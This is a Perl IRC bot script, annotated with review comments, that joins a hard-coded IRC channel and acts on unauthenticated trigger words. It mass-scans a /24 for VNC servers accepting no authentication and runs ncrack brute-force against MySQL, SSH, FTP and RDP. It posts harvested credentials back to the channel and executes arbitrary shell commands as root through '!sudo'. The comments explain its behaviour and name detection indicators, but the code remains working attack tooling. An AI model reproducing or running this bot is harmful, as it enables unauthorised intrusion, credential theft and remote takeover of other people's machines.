#!/usr/bin/perl
# Use at your own risk!
#
# NOTE(review): what this script actually is -- an IRC bot. It connects to the
# IRC server hard-coded below, joins a channel, and acts on trigger words it reads
# from that connection: "!scan a.b.c.*" fans out into 2**$splits forked processes
# that probe a /24 for VNC servers that accept no authentication and then run
# ncrack against MySQL/SSH/FTP/RDP; "!list" posts harvested credentials; "!sudo
# <cmd>" runs an arbitrary shell command as root and posts the output back.
# None of the triggers check who sent them, so the host running this script is
# remotely controllable by anyone who can get a message in front of the bot.
# The server name, channel and trigger strings below are useful detection
# indicators; the command strings are the ones a responder would grep for.
#
# For it to crack you need ncrack installed, or an OS that ships it (e.g. Kali Linux 2).
# You also need to create the files /user and /pass: the username and password
# lists that ncrack is pointed at (-U /user -P /pass) for every target.
# The code is still buggy. Sorry but I'm still noob at perl >_>
# Invoke the script like this: sudo perl scan.pl (or as root) perl scan.pl
# This script was made for educational purposes only; please don't attack military or government.
# When you think passwords have landed in your list, type !list to the bot or
# channel; it posts the credential lines it finds in xploits.log.

use IO::Socket;
use IO::Socket::INET;
use threads;            # NOTE(review): no thread is ever created; work is split with fork()
use threads::shared;    # only provides the ": shared" attribute below, which does not cross fork()
use Errno qw(EAGAIN);
use strict;
use warnings;
my $line;                # current raw line from the IRC server
our @results : shared;   # per-host result strings, indexed by last octet (filled in Scan_ALL)
our $todo = 0;           # per-process worker index, built one bit per fork in DivideWork
our $contatore = 0;      # not used anywhere in this script
my $orig_thread = "yes"; # set to "no" in forked children; never read afterwards
my $start;               # first and last host number this process scans
my $end;
my $out_file;            # not used anywhere in this script
my $range = 99999;
my $random_number = int(rand($range));   # random suffix for the throwaway nick
my @VNC_PORTS = qw/5900 5901/;           # probed for the no-authentication VNC check
my @ncrack_PORTS  = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] ); # [port, label]; the label is lower-cased into ncrack's proto:// target
my $splits = 8; # Creates 2^N processes.
our $subnet;             # "a.b.c." prefix set by the !scan handler and read by Scan_ALL
# Command-and-control endpoint: hard-coded IRC server, port and channel.
my $server="irc.crimeircd.net"; # irc server
my $porta="6667"; # port
my $nick="Guest$random_number";# nick
my $canale="#RDP"; # canale (the channel the bot joins and reports to)
# Connect and register. A refused connection is fatal. This socket is later
# inherited by every process DivideWork forks, and all of them read from it.
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Guest$random_number 8 * :Perl bot by independent\r\n";
  39.  
  40.  
while ($line = <$sk>) {
  # Main command loop. Every raw line from the IRC server is tested against each
  # trigger below, in order, with an unanchored regex. NOTE(review): no handler
  # checks the sender nick, the target channel, or even that the line is a
  # PRIVMSG, so a trigger word anywhere in anything the server sends (a channel
  # message from any user, a private message to the bot's nick, ...) fires the
  # handler. Several handlers can fire on the same line.
  $line =~ s/\r\n$//;
   warn "$line";   # every server line is echoed to stderr
   if ($line=~ /PING/) {
   # Keep-alive. Also (re)JOINs the channel on every PING, so the bot comes back
   # after a kick. The match is unanchored, so a chat line containing "PING"
   # triggers this as well.
   print $sk "PONG :$server\r\n";
   print $sk "JOIN $canale \r\n";
   printa("?Ping Pong!, pastebin.com/raw/cp5BZnv4");

  }
  if ($line=~ /nospoof/) {
   # Presumably a server-side spoof/bot check; the bot answers with a fake mIRC
   # version string and a CAP negotiation. NOTE(review): the exact server-side
   # behaviour this targets is not verifiable from this file.
   print $sk "NOTICE IRC :mIRC v7.45\r\n";
    print $sk "CAP LS\r\n";
   print $sk "CAP END\r\n";
  }
    if ($line=~ /!help/) {
printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
  }
  if ($line=~ /!list/)
  {
    # Post every line of xploits.log (ncrack output appended by Scan_ALL) that
    # contains a single quote -- presumably the lines in which ncrack quotes a
    # discovered username/password pair -- to the channel.

    my $file = 'xploits.log';
    # NOTE(review): "or warn" does not stop on failure; the readline on the then
    # undefined $fh below dies and takes the bot down with it.
    open my $fh, '<', $file or warn "Could not open '$file' $!\n";

    while (my $lines = <$fh>) {
      chomp $lines;
      if ($lines=~ /'/) {
        printa("$lines");
      }
    }
  }
  if ($line=~ /!reload/)
  {
    # Kills every perl process on the box (this bot included), starts a fresh
    # scan.pl from the shell's current directory, then kills ncrack -- all via sudo.
    printa("Reloading...");
    my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill ncrack");
    system(@cmd);
  }
  if ($line=~ /!die/)
  {
    # Same as !reload without the restart: kills all perl and ncrack processes.
    printa("Dying...");
    my @cmd = ("sudo pkill perl && sudo pkill ncrack");
    system(@cmd);
  }
  if ($line=~ /!sudo\s+(.*)/)
  {
    # NOTE(review): unauthenticated remote root shell. Whatever follows "!sudo "
    # on any line the bot reads is prefixed with "sudo", handed verbatim to the
    # shell via backticks, and its stdout+stderr are posted back to the channel.
    # Combined with the missing sender checks above, anyone who can get a line
    # containing "!sudo ..." in front of this socket -- any channel member, anyone
    # who /msg's the bot's nick, or the IRC server itself -- runs commands as root
    # on the machine hosting this script. Treat that machine as owned by the
    # channel, not merely as a scanner.
        my $command = $1;
        printa("Done: $command ");   # announced to the channel before the command runs
    my $cmd = "sudo $command";
    my @output = `$cmd 2>&1 3>&1`;
    foreach(@output) {
      # Each captured line still carries its own "\n", so the extra "\r\n" and the
      # ". " that printa appends end up as a separate, mostly empty IRC line.
      printa("$_\r\n");
    }
  }


  if ($line=~ /!scan (.+)/)
  {
    # Scan a /24. The argument is validated and then cut down to its first three
    # octets plus a trailing ".". That reduction is what makes $subnet safe to
    # interpolate into the ncrack shell command in Scan_ALL: after this block it
    # consists of digits and dots only.

    $todo = 0;
    $subnet = $1;
    if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {

      # Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
      $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
      $subnet .= ".";
      printa("Scanning subnet ${subnet}x\n");

      CHECK: {
        unless ($splits >= 0 && $splits <= 8) {
          die "ERROR: Do not split $splits times--that makes no sense.\n";
        }
      }

      # Ugly, but this works.
      # Each DivideWork() call forks once, so with $splits = 8 this ends up as
      # 256 processes, each holding a distinct $todo in 0..255.
      DivideWork() if $splits >= 1;
      DivideWork() if $splits >= 2;
      DivideWork() if $splits >= 3;
      DivideWork() if $splits >= 4;
      DivideWork() if $splits >= 5;
      DivideWork() if $splits >= 6;
      DivideWork() if $splits >= 7;
      DivideWork() if $splits >= 8;

      # Turn this process's $todo into its slice of 0..255 (a single host per
      # process at $splits = 8; Scan_ALL itself skips .0 and .255).
      $start = $todo << (8 - $splits);
      $end = $start + (256 / (2**$splits)) - 1;

      foreach ($start .. $end) {

        Scan_ALL($_);

      }
      # NOTE(review): nothing exits the forked children here. After their slice
      # they fall back into "while ($line = <$sk>)" alongside the parent, all
      # reading from the same inherited IRC socket, so each later command is
      # picked up by whichever process happens to read that line.
     }
   
   else {
      printa("Are you brain-dead? Use a correct IP format. ");
    }

  }
}
  140.  
  141.  
  142.   ####################################
  143.  
  sub DivideWork {
    # Fork once, doubling the number of worker processes. Each call shifts one bit
    # into the global $todo: the parent keeps the odd index (2*$todo + 1), the child
    # the even one (2*$todo). After $splits calls there are 2**$splits processes,
    # each holding a unique $todo in 0 .. 2**$splits - 1, which the caller turns
    # into a host range. Nothing here makes the child exit, so after its share of
    # the work a child returns into the caller's IRC loop exactly like the parent.
    # No arguments; no meaningful return value.
    my $pid;

    FORK: {
      $todo *= 2;
      if ($pid = fork) {
        # Parent
        ++$todo;

        } elsif (defined $pid) {
        # Child
        # $orig_thread is assigned here but never read anywhere in this script.
        $orig_thread = "no";

        } elsif ($! == EAGAIN) {
        # Recoverable forking error.
        # NOTE(review): redo restarts the FORK block from the top, so "$todo *= 2"
        # runs again on every retry and the resulting index (and host range) is
        # skewed for this process and all its descendants.
        sleep 7;
        redo FORK;

        } else {
        # Unable to fork.
        # Falls through as if this were the parent but without the ++$todo, so
        # the range the missing child would have taken (index 2*$todo + 1) is
        # simply never scanned. The error is only reported to the IRC channel.
        printa("Unable to fork: $!\n");

      }
    }
  }
  169.  
  170.  
  171.  
  sub Scan_ALL {
    # Probe one host of $subnet (the global set by the !scan handler).
    # Stage 1: on each of @VNC_PORTS, run the RFB handshake and ask for security
    #   type None regardless of what the server offered. The original comment
    #   calls this the OpenVNC 4.11 authentication bypass; note that nothing here
    #   checks the server version -- it simply tries the bypass on every server.
    # Stage 2: for the first port in @ncrack_PORTS that accepts a TCP connection,
    #   hand the host to ncrack with the /user and /pass wordlists and append its
    #   output to xploits.log (which !list reads back).
    # Side effects: writes @results (see the note below), posts progress to IRC
    # via printa(), and blocks this process for as long as ncrack runs.
    # Argument: $hostnum, the last octet to scan; 0 and 255 are skipped.
    # Scan for OpenVNC 4.11 authentication bypass.

    my $hostnum = shift;
    my $host = $subnet . $hostnum;   # $subnet already ends in "." (set in !scan)
    my $sock;                        # never assigned; both loops below declare their own $sock
    my $proto_ver;
    my $ignored;
    my $auth_type;
    my $sec_types;
    my $vnc_data;


    # Only false when $hostnum is missing, since $subnet is never empty here.
    # Note it reports the problem but does not return.
    $host or printa("ERROR: missing Host IP address Scan_ALL.");

    # The host numbers .0 and .255 are reserved; ignore them.
    if ($hostnum <= 0 or $hostnum >= 255) { return; }

    # Format things nicely--that crazy formula just adds spaces.
    # NOTE(review): @results is declared ": shared" (threads::shared), but the work
    # is split with fork() in DivideWork; threads::shared only shares between
    # threads, not across processes, so the parent never sees what a child writes.
    $results[$hostnum] = "$host";
    $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
    foreach my $port (@VNC_PORTS)
    {
      if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')) {

        # RFB ProtocolVersion: 12 bytes from the server, echoed back unchanged.
        $sock->read($proto_ver, 12);
        print $sock $proto_ver;

        # Get supported security types and ignore them.
        # (One count byte followed by that many type bytes, i.e. the RFB 3.7+
        # layout; a 3.3-style server that sends a single 4-byte type would be
        # misparsed here.)
        $sock->read($sec_types, 1);

        $sock->read($ignored, unpack('C', $sec_types));
        # Claim that we only support no authentication.
        # NOTE(review): the offered list was discarded, so a server that
        # legitimately offers type None (deliberately passwordless) cannot be told
        # apart from one that accepts a type it never offered. "VNC Vulnerable"
        # below therefore means "let us in without a password", not necessarily
        # "has the bypass bug".
        print $sock "\x01";


        # We should get "0000" back, indicating that they won't fall back to no authentication.
        # SecurityResult, 0 = OK. Only tested for non-zero, so the native byte
        # order of unpack('I') does not matter; but a short or empty read (server
        # hung up) also unpacks to false and is treated as "accepted".
        $sock->read($auth_type, 4);
        if (unpack('I', $auth_type)) {
          close($sock);
          # This returns from the whole sub: a refusal on 5900 skips 5901 and the
          # ncrack stage below entirely.
          return;
        }

        # Client initialize.
        print $sock "\x01";

        # If the server starts sending data, we're in.
        $sock->read($vnc_data, 4);
        # Announced before the 4 bytes are checked, so this fires for any server
        # that returned SecurityResult 0 (or hung up at that point).
        printa("[Xploiting VNC] $host");
        if (unpack('I', $vnc_data)) {
          $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
          printa("9,3 [ $port ] $results[$hostnum] $port ");
        }
      }
    }
    foreach my $port (@ncrack_PORTS)
    {
      if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port->[0], Proto => 'tcp')) {
        # Pure TCP connect check; the socket is closed before ncrack reconnects.
        close($sock);
        printa("[Cracking " . $port->[1] . "] $host");
        # Single-string system() goes through the shell (needed for the ">>"
        # redirect). The only interpolated values are the label from @ncrack_PORTS
        # and $host, which the !scan handler reduced to digits and dots, so there is
        # no shell injection as long as that sanitisation stays in place. Output is
        # appended to xploits.log in the current directory; the comma-separated
        # suffix and --connection-limit are ncrack timing/connection options (see
        # ncrack's documentation for their meaning).
        my @cmdncrack = ("ncrack -U /user -P /pass " . lc($port->[1]) . "://" . $host . ",at=5,cl=1,CL=3,cd=5s,cr=0,to=2h --connection-limit 64 -v -f >>xploits.log");
        system(@cmdncrack);
        # First open port wins; the remaining entries of @ncrack_PORTS are not tried.
        return;
      }
    }

    # The outer $sock was never opened (both loops shadow it with their own), so
    # this closes undef and only produces a warning.
    close($sock);
    return;
  }
  241.  
  sub printa {
    # Relay one line of bot output to the configured channel on the IRC socket.
    # Takes the message text as its only argument; returns whatever print returns.
    my ($msg) = @_;
    my $wire = "PRIVMSG $canale :4,5 $msg. \r\n";
    print {$sk} $wire;
  }